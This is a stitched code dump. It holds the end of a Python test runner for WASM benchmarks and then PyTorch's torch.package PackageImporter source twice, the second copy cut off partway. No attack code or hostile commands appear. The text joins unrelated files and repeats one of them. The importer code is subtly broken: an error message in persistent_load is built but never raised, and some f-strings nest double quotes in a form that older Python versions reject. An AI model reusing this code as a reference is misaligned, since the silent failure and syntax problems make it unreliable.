"expect_sha1": "05af9604bf352234276e4d64e84b8d666574316c"
}, {
"name": "smallpt (explicit light sampling)",
"wasm": "./wasi/smallpt/smallpt-ex.wasm",
"args": ["4", "32"],
"expect_sha1": "ea05d85998b2f453b588ef76a1256215bf9b851c"
}, {
"name": "mal",
"wasm": "./wasi/mal/mal.wasm",
"args": ["./wasi/mal/test-fib.mal", "16"],
"expect_pattern": "987\n",
}, {
"name": "Brotli",
"stdin": "./wasi/brotli/alice29_small.txt",
"wasm": "./wasi/brotli/brotli.wasm",
"args": ["-c", "-f"],
"expect_sha1": "0e8af02a7207c0c617d7d38eed92853c4a619987"
}
]
def fail(msg):
print(f"{ansi.FAIL}FAIL:{ansi.ENDC} {msg}")
stats.failed += 1
commands = commands_fast if args.fast else commands_full
for cmd in commands:
if "skip" in cmd:
continue
command = args.exec.split(' ')
command.append(cmd['wasm'])
if "args" in cmd:
if args.separate_args:
command.append("--")
command.extend(cmd['args'])
command = list(map(str, command))
print(f"=== {cmd['name']} ===")
stats.total_run += 1
try:
if "stdin" in cmd:
fn = cmd['stdin']
f = open(fn, "rb")
print(f"cat {fn} | {' '.join(command)}")
output = subprocess.check_output(command, timeout=args.timeout, stdin=f)
elif "can_crash" in cmd:
print(f"{' '.join(command)}")
output = subprocess.run(command, timeout=args.timeout, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout
else:
print(f"{' '.join(command)}")
output = subprocess.check_output(command, timeout=args.timeout)
except subprocess.TimeoutExpired:
stats.timeout += 1
fail("Timeout")
continue
except subprocess.CalledProcessError:
stats.crashed += 1
fail("Crashed")
continue
if "expect_sha1" in cmd:
actual = hashlib.sha1(output).hexdigest()
if actual != cmd['expect_sha1']:
fail(f"Actual sha1: {actual}")
if "expect_pattern" in cmd:
actual = output.decode("utf-8")
if not fnmatch.fnmatch(actual, cmd['expect_pattern']):
fail(f"Output does not match pattern:\n{actual}")
print()
pprint(stats)
if stats.failed:
print(f"{ansi.FAIL}=======================")
print(f" FAILED: {stats.failed}/{stats.total_run}")
print(f"======================={ansi.ENDC}")
sys.exit(1)
else:
print(f"{ansi.OKGREEN}=======================")
print(f" All {stats.total_run} tests OK")
print(f"======================={ansi.ENDC}")
|
import builtins
import importlib
import inspect
import io
import linecache
import os.path
import types
from contextlib import contextmanager
from pathlib import Path
from typing import Any, BinaryIO, Callable, cast, Dict, List, Optional, Union
from weakref import WeakValueDictionary
import torch
from torch.serialization import _get_restore_location, _maybe_decode_ascii
from ._directory_reader import DirectoryReader
from ._importlib import (
_calc___package__,
_normalize_line_endings,
_normalize_path,
_resolve_name,
_sanity_check,
)
from ._mangling import demangle, PackageMangler
from ._package_unpickler import PackageUnpickler
from .file_structure_representation import _create_directory_from_file_list, Directory
from .glob_group import GlobPattern
from .importer import Importer
class PackageImporter(Importer):
"""Importers allow you to load code written to packages by :class:`PackageExporter`.
Code is loaded in a hermetic way, using files from the package
rather than the normal python import system. This allows
for the packaging of PyTorch model code and data so that it can be run
on a server or used in the future for transfer learning.
The importer for packages ensures that code in the module can only be loaded from
within the package, except for modules explicitly listed as external during export.
The file ``extern_modules`` in the zip archive lists all the modules that a package externally depends on.
This prevents "implicit" dependencies where the package runs locally because it is importing
a locally-installed package, but then fails when the package is copied to another machine.
"""
"""The dictionary of already loaded modules from this package, equivalent to ``sys.modules`` but
local to this importer.
"""
torch._C._log_api_usage_once("torch.package.PackageImporter")
modules: Dict[str, types.ModuleType]
def __init__(
self,
file_or_buffer: Union[str, torch._C.PyTorchFileReader, Path, BinaryIO],
module_allowed: Callable[[str], bool] = lambda module_name: True,
):
"""Open ``file_or_buffer`` for importing. This checks that the imported package only requires modules
allowed by ``module_allowed``
Args:
file_or_buffer: a file-like object (has to implement :meth:`read`, :meth:`readline`, :meth:`tell`, and :meth:`seek`),
a string, or an ``os.PathLike`` object containing a filename.
module_allowed (Callable[[str], bool], optional): A method to determine if a externally provided module
should be allowed. Can be used to ensure packages loaded do not depend on modules that the server
does not support. Defaults to allowing anything.
Raises:
ImportError: If the package will use a disallowed module.
"""
self.zip_reader: Any
if isinstance(file_or_buffer, torch._C.PyTorchFileReader):
self.filename = "<pytorch_file_reader>"
self.zip_reader = file_or_buffer
elif isinstance(file_or_buffer, (Path, str)):
self.filename = str(file_or_buffer)
if not os.path.isdir(self.filename):
self.zip_reader = torch._C.PyTorchFileReader(self.filename)
else:
self.zip_reader = DirectoryReader(self.filename)
else:
self.filename = "<binary>"
self.zip_reader = torch._C.PyTorchFileReader(file_or_buffer)
self.root = _PackageNode(None)
self.modules = {}
self.extern_modules = self._read_extern()
for extern_module in self.extern_modules:
if not module_allowed(extern_module):
raise ImportError(
f"package '{file_or_buffer}' needs the external module '{extern_module}' "
f"but that module has been disallowed"
)
self._add_extern(extern_module)
for fname in self.zip_reader.get_all_records():
self._add_file(fname)
self.patched_builtins = builtins.__dict__.copy()
self.patched_builtins["__import__"] = self.__import__
# Allow packaged modules to reference their PackageImporter
self.modules["torch_package_importer"] = self # type: ignore[assignment]
self._mangler = PackageMangler()
# used for reduce deserializaiton
self.storage_context: Any = None
self.last_map_location = None
# used for torch.serialization._load
self.Unpickler = lambda *args, **kwargs: PackageUnpickler(self, *args, **kwargs)
def import_module(self, name: str, package=None):
"""Load a module from the package if it hasn't already been loaded, and then return
the module. Modules are loaded locally
to the importer and will appear in ``self.modules`` rather than ``sys.modules``.
Args:
name (str): Fully qualified name of the module to load.
package ([type], optional): Unused, but present to match the signature of importlib.import_module. Defaults to ``None``.
Returns:
types.ModuleType: The (possibly already) loaded module.
"""
# We should always be able to support importing modules from this package.
# This is to support something like:
# obj = importer.load_pickle(...)
# importer.import_module(obj.__module__) <- this string will be mangled
#
# Note that _mangler.demangle will not demangle any module names
# produced by a different PackageImporter instance.
name = self._mangler.demangle(name)
return self._gcd_import(name)
def load_binary(self, package: str, resource: str) -> bytes:
"""Load raw bytes.
Args:
package (str): The name of module package (e.g. ``"my_package.my_subpackage"``).
resource (str): The unique name for the resource.
Returns:
bytes: The loaded data.
"""
path = self._zipfile_path(package, resource)
return self.zip_reader.get_record(path)
def load_text(
self,
package: str,
resource: str,
encoding: str = "utf-8",
errors: str = "strict",
) -> str:
"""Load a string.
Args:
package (str): The name of module package (e.g. ``"my_package.my_subpackage"``).
resource (str): The unique name for the resource.
encoding (str, optional): Passed to ``decode``. Defaults to ``'utf-8'``.
errors (str, optional): Passed to ``decode``. Defaults to ``'strict'``.
Returns:
str: The loaded text.
"""
data = self.load_binary(package, resource)
return data.decode(encoding, errors)
def load_pickle(self, package: str, resource: str, map_location=None) -> Any:
"""Unpickles the resource from the package, loading any modules that are needed to construct the objects
using :meth:`import_module`.
Args:
package (str): The name of module package (e.g. ``"my_package.my_subpackage"``).
resource (str): The unique name for the resource.
map_location: Passed to `torch.load` to determine how tensors are mapped to devices. Defaults to ``None``.
Returns:
Any: The unpickled object.
"""
pickle_file = self._zipfile_path(package, resource)
restore_location = _get_restore_location(map_location)
loaded_storages = {}
loaded_reduces = {}
storage_context = torch._C.DeserializationStorageContext()
def load_tensor(dtype, size, key, location, restore_location):
name = f"{key}.storage"
if storage_context.has_storage(name):
storage = storage_context.get_storage(name, dtype).storage()
else:
tensor = self.zip_reader.get_storage_from_record(
".data/" + name, size, dtype
)
if isinstance(self.zip_reader, torch._C.PyTorchFileReader):
storage_context.add_storage(name, tensor)
storage = tensor.storage()
loaded_storages[key] = restore_location(storage, location)
def persistent_load(saved_id):
assert isinstance(saved_id, tuple)
typename = _maybe_decode_ascii(saved_id[0])
data = saved_id[1:]
if typename == "storage":
storage_type, key, location, size = data
dtype = storage_type.dtype
if key not in loaded_storages:
load_tensor(
dtype,
size,
key,
_maybe_decode_ascii(location),
restore_location,
)
storage = loaded_storages[key]
# TODO: Once we decide to break serialization FC, we can
# stop wrapping with _TypedStorage
return torch.storage._TypedStorage(
wrap_storage=storage._untyped(), dtype=dtype
)
elif typename == "reduce_package":
# to fix BC breaking change, objects on this load path
# will be loaded multiple times erroneously
if len(data) == 2:
func, args = data
return func(self, *args)
reduce_id, func, args = data
if reduce_id not in loaded_reduces:
loaded_reduces[reduce_id] = func(self, *args)
return loaded_reduces[reduce_id]
else:
f"Unknown typename for persistent_load, expected 'storage' or 'reduce_package' but got '{typename}'"
# Load the data (which may in turn use `persistent_load` to load tensors)
data_file = io.BytesIO(self.zip_reader.get_record(pickle_file))
unpickler = self.Unpickler(data_file)
unpickler.persistent_load = persistent_load # type: ignore[assignment]
@contextmanager
def set_deserialization_context():
# to let reduce_package access deserializaiton context
self.storage_context = storage_context
self.last_map_location = map_location
try:
yield
finally:
self.storage_context = None
self.last_map_location = None
with set_deserialization_context():
result = unpickler.load()
# TODO from zdevito:
# This stateful weird function will need to be removed in our efforts
# to unify the format. It has a race condition if multiple python
# threads try to read independent files
torch._utils._validate_loaded_sparse_tensors()
return result
def id(self):
"""
Returns internal identifier that torch.package uses to distinguish :class:`PackageImporter` instances.
Looks like::
<torch_package_0>
"""
return self._mangler.parent_name()
def file_structure(
self, *, include: "GlobPattern" = "**", exclude: "GlobPattern" = ()
) -> Directory:
"""Returns a file structure representation of package's zipfile.
Args:
include (Union[List[str], str]): An optional string e.g. ``"my_package.my_subpackage"``, or optional list of strings
for the names of the files to be inluded in the zipfile representation. This can also be
a glob-style pattern, as described in :meth:`PackageExporter.mock`
exclude (Union[List[str], str]): An optional pattern that excludes files whose name match the pattern.
Returns:
:class:`Directory`
"""
return _create_directory_from_file_list(
self.filename, self.zip_reader.get_all_records(), include, exclude
)
def python_version(self):
"""Returns the version of python that was used to create this package.
Note: this function is experimental and not Forward Compatible. The plan is to move this into a lock
file later on.
Returns:
:class:`Optional[str]` a python version e.g. 3.8.9 or None if no version was stored with this package
"""
python_version_path = ".data/python_version"
return (
self.zip_reader.get_record(python_version_path).decode("utf-8").strip()
if self.zip_reader.has_record(python_version_path)
else None
)
def _read_extern(self):
return (
self.zip_reader.get_record(".data/extern_modules")
.decode("utf-8")
.splitlines(keepends=False)
)
def _make_module(
self, name: str, filename: Optional[str], is_package: bool, parent: str
):
mangled_filename = self._mangler.mangle(filename) if filename else None
spec = importlib.machinery.ModuleSpec(
name,
self, # type: ignore[arg-type]
origin="<package_importer>",
is_package=is_package,
)
module = importlib.util.module_from_spec(spec)
self.modules[name] = module
module.__name__ = self._mangler.mangle(name)
ns = module.__dict__
ns["__spec__"] = spec
ns["__loader__"] = self
ns["__file__"] = mangled_filename
ns["__cached__"] = None
ns["__builtins__"] = self.patched_builtins
ns["__torch_package__"] = True
# Add this module to our private global registry. It should be unique due to mangling.
assert module.__name__ not in _package_imported_modules
_package_imported_modules[module.__name__] = module
# pre-emptively install on the parent to prevent IMPORT_FROM from trying to
# access sys.modules
self._install_on_parent(parent, name, module)
if filename is not None:
assert mangled_filename is not None
# pre-emptively install the source in `linecache` so that stack traces,
# `inspect`, etc. work.
assert filename not in linecache.cache # type: ignore[attr-defined]
linecache.lazycache(mangled_filename, ns)
code = self._compile_source(filename, mangled_filename)
exec(code, ns)
return module
def _load_module(self, name: str, parent: str):
cur: _PathNode = self.root
for atom in name.split("."):
if not isinstance(cur, _PackageNode) or atom not in cur.children:
raise ModuleNotFoundError(
f'No module named "{name}" in self-contained archive "{self.filename}"'
f" and the module is also not in the list of allowed external modules: {self.extern_modules}",
name=name,
)
cur = cur.children[atom]
if isinstance(cur, _ExternNode):
module = self.modules[name] = importlib.import_module(name)
return module
return self._make_module(name, cur.source_file, isinstance(cur, _PackageNode), parent) # type: ignore[attr-defined]
def _compile_source(self, fullpath: str, mangled_filename: str):
source = self.zip_reader.get_record(fullpath)
source = _normalize_line_endings(source)
return compile(source, mangled_filename, "exec", dont_inherit=True)
# note: named `get_source` so that linecache can find the source
# when this is the __loader__ of a module.
def get_source(self, module_name) -> str:
# linecache calls `get_source` with the `module.__name__` as the argument, so we must demangle it here.
module = self.import_module(demangle(module_name))
return self.zip_reader.get_record(demangle(module.__file__)).decode("utf-8")
# note: named `get_resource_reader` so that importlib.resources can find it.
# This is otherwise considered an internal method.
def get_resource_reader(self, fullname):
try:
package = self._get_package(fullname)
except ImportError:
return None
if package.__loader__ is not self:
return None
return _PackageResourceReader(self, fullname)
def _install_on_parent(self, parent: str, name: str, module: types.ModuleType):
if not parent:
return
# Set the module as an attribute on its parent.
parent_module = self.modules[parent]
if parent_module.__loader__ is self:
setattr(parent_module, name.rpartition(".")[2], module)
# note: copied from cpython's import code, with call to create module replaced with _make_module
def _do_find_and_load(self, name):
path = None
parent = name.rpartition(".")[0]
if parent:
if parent not in self.modules:
self._gcd_import(parent)
# Crazy side-effects!
if name in self.modules:
return self.modules[name]
parent_module = self.modules[parent]
try:
path = parent_module.__path__ # type: ignore[attr-defined]
except AttributeError:
msg = (_ERR_MSG + "; {!r} is not a package").format(name, parent)
raise ModuleNotFoundError(msg, name=name) from None
module = self._load_module(name, parent)
self._install_on_parent(parent, name, module)
return module
# note: copied from cpython's import code
def _find_and_load(self, name):
module = self.modules.get(name, _NEEDS_LOADING)
if module is _NEEDS_LOADING:
return self._do_find_and_load(name)
if module is None:
message = "import of {} halted; " "None in sys.modules".format(name)
raise ModuleNotFoundError(message, name=name)
# To handle https://github.com/pytorch/pytorch/issues/57490, where std's
# creation of fake submodules via the hacking of sys.modules is not import
# friendly
if name == "os":
self.modules["os.path"] = cast(Any, module).path
elif name == "typing":
self.modules["typing.io"] = cast(Any, module).io
self.modules["typing.re"] = cast(Any, module).re
return module
def _gcd_import(self, name, package=None, level=0):
"""Import and return the module based on its name, the package the call is
being made from, and the level adjustment.
This function represents the greatest common denominator of functionality
between import_module and __import__. This includes setting __package__ if
the loader did not.
"""
_sanity_check(name, package, level)
if level > 0:
name = _resolve_name(name, package, level)
return self._find_and_load(name)
# note: copied from cpython's import code
def _handle_fromlist(self, module, fromlist, *, recursive=False):
"""Figure out what __import__ should return.
The import_ parameter is a callable which takes the name of module to
import. It is required to decouple the function from assuming importlib's
import implementation is desired.
"""
module_name = demangle(module.__name__)
# The hell that is fromlist ...
# If a package was imported, try to import stuff from fromlist.
if hasattr(module, "__path__"):
for x in fromlist:
if not isinstance(x, str):
if recursive:
where = module_name + ".__all__"
else:
where = "``from list''"
raise TypeError(
f"Item in {where} must be str, " f"not {type(x).__name__}"
)
elif x == "*":
if not recursive and hasattr(module, "__all__"):
self._handle_fromlist(module, module.__all__, recursive=True)
elif not hasattr(module, x):
from_name = "{}.{}".format(module_name, x)
try:
self._gcd_import(from_name)
except ModuleNotFoundError as exc:
# Backwards-compatibility dictates we ignore failed
# imports triggered by fromlist for modules that don't
# exist.
if (
exc.name == from_name
and self.modules.get(from_name, _NEEDS_LOADING) is not None
):
continue
raise
return module
def __import__(self, name, globals=None, locals=None, fromlist=(), level=0):
if level == 0:
module = self._gcd_import(name)
else:
globals_ = globals if globals is not None else {}
package = _calc___package__(globals_)
module = self._gcd_import(name, package, level)
if not fromlist:
# Return up to the first dot in 'name'. This is complicated by the fact
# that 'name' may be relative.
if level == 0:
return self._gcd_import(name.partition(".")[0])
elif not name:
return module
else:
# Figure out where to slice the module's name up to the first dot
# in 'name'.
cut_off = len(name) - len(name.partition(".")[0])
# Slice end needs to be positive to alleviate need to special-case
# when ``'.' not in name``.
module_name = demangle(module.__name__)
return self.modules[module_name[: len(module_name) - cut_off]]
else:
return self._handle_fromlist(module, fromlist)
def _get_package(self, package):
"""Take a package name or module object and return the module.
If a name, the module is imported. If the passed or imported module
object is not a package, raise an exception.
"""
if hasattr(package, "__spec__"):
if package.__spec__.submodule_search_locations is None:
raise TypeError("{!r} is not a package".format(package.__spec__.name))
else:
return package
else:
module = self.import_module(package)
if module.__spec__.submodule_search_locations is None:
raise TypeError("{!r} is not a package".format(package))
else:
return module
def _zipfile_path(self, package, resource=None):
package = self._get_package(package)
assert package.__loader__ is self
name = demangle(package.__name__)
if resource is not None:
resource = _normalize_path(resource)
return f"{name.replace(".", "/")}/{resource}"
else:
return f"{name.replace(".", "/")}"
def _get_or_create_package(
self, atoms: List[str]
) -> "Union[_PackageNode, _ExternNode]":
cur = self.root
for i, atom in enumerate(atoms):
node = cur.children.get(atom, None)
if node is None:
node = cur.children[atom] = _PackageNode(None)
if isinstance(node, _ExternNode):
return node
if isinstance(node, _ModuleNode):
name = ".".join(atoms[:i])
raise ImportError(
f"inconsistent module structure. module {name} is not a package, but has submodules"
)
assert isinstance(node, _PackageNode)
cur = node
return cur
def _add_file(self, filename: str):
"""Assembles a Python module out of the given file. Will ignore files in the .data directory.
Args:
filename (str): the name of the file inside of the package archive to be added
"""
*prefix, last = filename.split("/")
if len(prefix) > 1 and prefix[0] == ".data":
return
package = self._get_or_create_package(prefix)
if isinstance(package, _ExternNode):
raise ImportError(
f"inconsistent module structure. package contains a module file {filename}"
f" that is a subpackage of a module marked external."
)
if last == "__init__.py":
package.source_file = filename
elif last.endswith(".py"):
package_name = last[: -len(".py")]
package.children[package_name] = _ModuleNode(filename)
def _add_extern(self, extern_name: str):
*prefix, last = extern_name.split(".")
package = self._get_or_create_package(prefix)
if isinstance(package, _ExternNode):
return # the shorter extern covers this extern case
package.children[last] = _ExternNode()
_NEEDS_LOADING = object()
_ERR_MSG_PREFIX = "No module named "
_ERR_MSG = _ERR_MSG_PREFIX + "{!r}"
class _PathNode:
pass
class _PackageNode(_PathNode):
def __init__(self, source_file: Optional[str]):
self.source_file = source_file
self.children: Dict[str, _PathNode] = {}
class _ModuleNode(_PathNode):
__slots__ = ["source_file"]
def __init__(self, source_file: str):
self.source_file = source_file
class _ExternNode(_PathNode):
pass
# A private global registry of all modules that have been package-imported.
_package_imported_modules: WeakValueDictionary = WeakValueDictionary()
# `inspect` by default only looks in `sys.modules` to find source files for classes.
# Patch it to check our private registry of package-imported modules as well.
_orig_getfile = inspect.getfile
def patched_getfile(object):
if inspect.isclass(object):
if object.__module__ in _package_imported_modules:
return _package_imported_modules[object.__module__].__file__
return _orig_getfile(object)
inspect.getfile = patched_getfile
class _PackageResourceReader:
"""Private class used to support PackageImporter.get_resource_reader().
Confirms to the importlib.abc.ResourceReader interface. Allowed to access
the innards of PackageImporter.
"""
def __init__(self, importer, fullname):
self.importer = importer
self.fullname = fullname
def open_resource(self, resource):
from io import BytesIO
return BytesIO(self.importer.load_binary(self.fullname, resource))
def resource_path(self, resource):
# The contract for resource_path is that it either returns a concrete
# file system path or raises FileNotFoundError.
if isinstance(
self.importer.zip_reader, DirectoryReader
) and self.importer.zip_reader.has_record(
os.path.join(self.fullname, resource)
):
return os.path.join(
self.importer.zip_reader.directory, self.fullname, resource
)
raise FileNotFoundError
def is_resource(self, name):
path = self.importer._zipfile_path(self.fullname, name)
return self.importer.zip_reader.has_record(path)
def contents(self):
from pathlib import Path
filename = self.fullname.replace(".", "/")
fullname_path = Path(self.importer._zipfile_path(self.fullname))
files = self.importer.zip_reader.get_all_records()
subdirs_seen = set()
for filename in files:
try:
relative = Path(filename).relative_to(fullname_path)
except ValueError:
continue
# If the path of the file (which is relative to the top of the zip
# namespace), relative to the package given when the resource
# reader was created, has a parent, then it's a name in a
# subdirectory and thus we skip it.
parent_name = relative.parent.name
if len(parent_name) == 0:
yield relative.name
elif parent_name not in subdirs_seen:
subdirs_seen.add(parent_name)
yield parent_name
| import builtins
import importlib
import inspect
import io
import linecache
import os.path
import types
from contextlib import contextmanager
from pathlib import Path
from typing import Any, BinaryIO, Callable, cast, Dict, List, Optional, Union
from weakref import WeakValueDictionary
import torch
from torch.serialization import _get_restore_location, _maybe_decode_ascii
from ._directory_reader import DirectoryReader
from ._importlib import (
_calc___package__,
_normalize_line_endings,
_normalize_path,
_resolve_name,
_sanity_check,
)
from ._mangling import demangle, PackageMangler
from ._package_unpickler import PackageUnpickler
from .file_structure_representation import _create_directory_from_file_list, Directory
from .glob_group import GlobPattern
from .importer import Importer
class PackageImporter(Importer):
"""Importers allow you to load code written to packages by :class:`PackageExporter`.
Code is loaded in a hermetic way, using files from the package
rather than the normal python import system. This allows
for the packaging of PyTorch model code and data so that it can be run
on a server or used in the future for transfer learning.
The importer for packages ensures that code in the module can only be loaded from
within the package, except for modules explicitly listed as external during export.
The file ``extern_modules`` in the zip archive lists all the modules that a package externally depends on.
This prevents "implicit" dependencies where the package runs locally because it is importing
a locally-installed package, but then fails when the package is copied to another machine.
"""
"""The dictionary of already loaded modules from this package, equivalent to ``sys.modules`` but
local to this importer.
"""
torch._C._log_api_usage_once("torch.package.PackageImporter")
modules: Dict[str, types.ModuleType]
def __init__(
self,
file_or_buffer: Union[str, torch._C.PyTorchFileReader, Path, BinaryIO],
module_allowed: Callable[[str], bool] = lambda module_name: True,
):
"""Open ``file_or_buffer`` for importing. This checks that the imported package only requires modules
allowed by ``module_allowed``
Args:
file_or_buffer: a file-like object (has to implement :meth:`read`, :meth:`readline`, :meth:`tell`, and :meth:`seek`),
a string, or an ``os.PathLike`` object containing a filename.
module_allowed (Callable[[str], bool], optional): A method to determine if a externally provided module
should be allowed. Can be used to ensure packages loaded do not depend on modules that the server
does not support. Defaults to allowing anything.
Raises:
ImportError: If the package will use a disallowed module.
"""
self.zip_reader: Any
if isinstance(file_or_buffer, torch._C.PyTorchFileReader):
self.filename = "<pytorch_file_reader>"
self.zip_reader = file_or_buffer
elif isinstance(file_or_buffer, (Path, str)):
self.filename = str(file_or_buffer)
if not os.path.isdir(self.filename):
self.zip_reader = torch._C.PyTorchFileReader(self.filename)
else:
self.zip_reader = DirectoryReader(self.filename)
else:
self.filename = "<binary>"
self.zip_reader = torch._C.PyTorchFileReader(file_or_buffer)
self.root = _PackageNode(None)
self.modules = {}
self.extern_modules = self._read_extern()
for extern_module in self.extern_modules:
if not module_allowed(extern_module):
raise ImportError(
f"package '{file_or_buffer}' needs the external module '{extern_module}' "
f"but that module has been disallowed"
)
self._add_extern(extern_module)
for fname in self.zip_reader.get_all_records():
self._add_file(fname)
self.patched_builtins = builtins.__dict__.copy()
self.patched_builtins["__import__"] = self.__import__
# Allow packaged modules to reference their PackageImporter
self.modules["torch_package_importer"] = self # type: ignore[assignment]
self._mangler = PackageMangler()
# used for reduce deserializaiton
self.storage_context: Any = None
self.last_map_location = None
# used for torch.serialization._load
self.Unpickler = lambda *args, **kwargs: PackageUnpickler(self, *args, **kwargs)
def import_module(self, name: str, package=None):
"""Load a module from the package if it hasn't already been loaded, and then return
the module. Modules are loaded locally
to the importer and will appear in ``self.modules`` rather than ``sys.modules``.
Args:
name (str): Fully qualified name of the module to load.
package ([type], optional): Unused, but present to match the signature of importlib.import_module. Defaults to ``None``.
Returns:
types.ModuleType: The (possibly already) loaded module.
"""
# We should always be able to support importing modules from this package.
# This is to support something like:
# obj = importer.load_pickle(...)
# importer.import_module(obj.__module__) <- this string will be mangled
#
# Note that _mangler.demangle will not demangle any module names
# produced by a different PackageImporter instance.
name = self._mangler.demangle(name)
return self._gcd_import(name)
def load_binary(self, package: str, resource: str) -> bytes:
"""Load raw bytes.
Args:
package (str): The name of module package (e.g. ``"my_package.my_subpackage"``).
resource (str): The unique name for the resource.
Returns:
bytes: The loaded data.
"""
path = self._zipfile_path(package, resource)
return self.zip_reader.get_record(path)
def load_text(
self,
package: str,
resource: str,
encoding: str = "utf-8",
errors: str = "strict",
) -> str:
"""Load a string.
Args:
package (str): The name of module package (e.g. ``"my_package.my_subpackage"``).
resource (str): The unique name for the resource.
encoding (str, optional): Passed to ``decode``. Defaults to ``'utf-8'``.
errors (str, optional): Passed to ``decode``. Defaults to ``'strict'``.
Returns:
str: The loaded text.
"""
data = self.load_binary(package, resource)
return data.decode(encoding, errors)
def load_pickle(self, package: str, resource: str, map_location=None) -> Any:
"""Unpickles the resource from the package, loading any modules that are needed to construct the objects
using :meth:`import_module`.
Args:
package (str): The name of module package (e.g. ``"my_package.my_subpackage"``).
resource (str): The unique name for the resource.
map_location: Passed to `torch.load` to determine how tensors are mapped to devices. Defaults to ``None``.
Returns:
Any: The unpickled object.
"""
pickle_file = self._zipfile_path(package, resource)
restore_location = _get_restore_location(map_location)
loaded_storages = {}
loaded_reduces = {}
storage_context = torch._C.DeserializationStorageContext()
def load_tensor(dtype, size, key, location, restore_location):
name = f"{key}.storage"
if storage_context.has_storage(name):
storage = storage_context.get_storage(name, dtype).storage()
else:
tensor = self.zip_reader.get_storage_from_record(
".data/" + name, size, dtype
)
if isinstance(self.zip_reader, torch._C.PyTorchFileReader):
storage_context.add_storage(name, tensor)
storage = tensor.storage()
loaded_storages[key] = restore_location(storage, location)
def persistent_load(saved_id):
assert isinstance(saved_id, tuple)
typename = _maybe_decode_ascii(saved_id[0])
data = saved_id[1:]
if typename == "storage":
storage_type, key, location, size = data
dtype = storage_type.dtype
if key not in loaded_storages:
load_tensor(
dtype,
size,
key,
_maybe_decode_ascii(location),
restore_location,
)
storage = loaded_storages[key]
# TODO: Once we decide to break serialization FC, we can
# stop wrapping with _TypedStorage
return torch.storage._TypedStorage(
wrap_storage=storage._untyped(), dtype=dtype
)
elif typename == "reduce_package":
# to fix BC breaking change, objects on this load path
# will be loaded multiple times erroneously
if len(data) == 2:
func, args = data
return func(self, *args)
reduce_id, func, args = data
if reduce_id not in loaded_reduces:
loaded_reduces[reduce_id] = func(self, *args)
return loaded_reduces[reduce_id]
else:
f"Unknown typename for persistent_load, expected 'storage' or 'reduce_package' but got '{typename}'"
# Load the data (which may in turn use `persistent_load` to load tensors)
data_file = io.BytesIO(self.zip_reader.get_record(pickle_file))
unpickler = self.Unpickler(data_file)
unpickler.persistent_load = persistent_load # type: ignore[assignment]
@contextmanager
def set_deserialization_context():
# to let reduce_package access deserializaiton context
self.storage_context = storage_context
self.last_map_location = map_location
try:
yield
finally:
self.storage_context = None
self.last_map_location = None
with set_deserialization_context():
result = unpickler.load()
# TODO from zdevito:
# This stateful weird function will need to be removed in our efforts
# to unify the format. It has a race condition if multiple python
# threads try to read independent files
torch._utils._validate_loaded_sparse_tensors()
return result
def id(self):
"""
Returns internal identifier that torch.package uses to distinguish :class:`PackageImporter` instances.
Looks like::
<torch_package_0>
"""
return self._mangler.parent_name()
def file_structure(
self, *, include: "GlobPattern" = "**", exclude: "GlobPattern" = ()
) -> Directory:
"""Returns a file structure representation of package's zipfile.
Args:
include (Union[List[str], str]): An optional string e.g. ``"my_package.my_subpackage"``, or optional list of strings
for the names of the files to be inluded in the zipfile representation. This can also be
a glob-style pattern, as described in :meth:`PackageExporter.mock`
exclude (Union[List[str], str]): An optional pattern that excludes files whose name match the pattern.
Returns:
:class:`Directory`
"""
return _create_directory_from_file_list(
self.filename, self.zip_reader.get_all_records(), include, exclude
)
def python_version(self):
"""Returns the version of python that was used to create this package.
Note: this function is experimental and not Forward Compatible. The plan is to move this into a lock
file later on.
Returns:
:class:`Optional[str]` a python version e.g. 3.8.9 or None if no version was stored with this package
"""
python_version_path = ".data/python_version"
return (
self.zip_reader.get_record(python_version_path).decode("utf-8").strip()
if self.zip_reader.has_record(python_version_path)
else None
)
def _read_extern(self):
return (
self.zip_reader.get_record(".data/extern_modules")
.decode("utf-8")
.splitlines(keepends=False)
)
def _make_module(
self, name: str, filename: Optional[str], is_package: bool, parent: str
):
mangled_filename = self._mangler.mangle(filename) if filename else None
spec = importlib.machinery.ModuleSpec(
name,
self, # type: ignore[arg-type]
origin="<package_importer>",
is_package=is_package,
)
module = importlib.util.module_from_spec(spec)
self.modules[name] = module
module.__name__ = self._mangler.mangle(name)
ns = module.__dict__
ns["__spec__"] = spec
ns["__loader__"] = self
ns["__file__"] = mangled_filename
ns["__cached__"] = None
ns["__builtins__"] = self.patched_builtins
ns["__torch_package__"] = True
# Add this module to our private global registry. It should be unique due to mangling.
assert module.__name__ not in _package_imported_modules
_package_imported_modules[module.__name__] = module
# pre-emptively install on the parent to prevent IMPORT_FROM from trying to
# access sys.modules
self._install_on_parent(parent, name, module)
if filename is not None:
assert mangled_filename is not None
# pre-emptively install the source in `linecache` so that stack traces,
# `inspect`, etc. work.
assert filename not in linecache.cache # type: ignore[attr-defined]
linecache.lazycache(mangled_filename, ns)
code = self._compile_source(filename, mangled_filename)
exec(code, ns)
return module
def _load_module(self, name: str, parent: str):
cur: _PathNode = self.root
for atom in name.split("."):
if not isinstance(cur, _PackageNode) or atom not in cur.children:
raise ModuleNotFoundError(
f'No module named "{name}" in self-contained archive "{self.filename}"'
f" and the module is also not in the list of allowed external modules: {self.extern_modules}",
name=name,
)
cur = cur.children[atom]
if isinstance(cur, _ExternNode):
module = self.modules[name] = importlib.import_module(name)
return module
return self._make_module(name, cur.source_file, isinstance(cur, _PackageNode), parent) # type: ignore[attr-defined]
def _compile_source(self, fullpath: str, mangled_filename: str):
source = self.zip_reader.get_record(fullpath)
source = _normalize_line_endings(source)
return compile(source, mangled_filename, "exec", dont_inherit=True)
# note: named `get_source` so that linecache can find the source
# when this is the __loader__ of a module.
def get_source(self, module_name) -> str:
# linecache calls `get_source` with the `module.__name__` as the argument, so we must demangle it here.
module = self.import_module(demangle(module_name))
return self.zip_reader.get_record(demangle(module.__file__)).decode("utf-8")
# note: named `get_resource_reader` so that importlib.resources can find it.
# This is otherwise considered an internal method.
def get_resource_reader(self, fullname):
try:
package = self._get_package(fullname)
except ImportError:
return None
if package.__loader__ is not self:
return None
return _PackageResourceReader(self, fullname)
def _install_on_parent(self, parent: str, name: str, module: types.ModuleType):
if not parent:
return
# Set the module as an attribute on its parent.
parent_module = self.modules[parent]
if parent_module.__loader__ is self:
setattr(parent_module, name.rpartition(".")[2], module)
# note: copied from cpython's import code, with call to create module replaced with _make_module
def _do_find_and_load(self, name):
path = None
parent = name.rpartition(".")[0]
if parent:
if parent not in self.modules:
self._gcd_import(parent)
# Crazy side-effects!
if name in self.modules:
return self.modules[name]
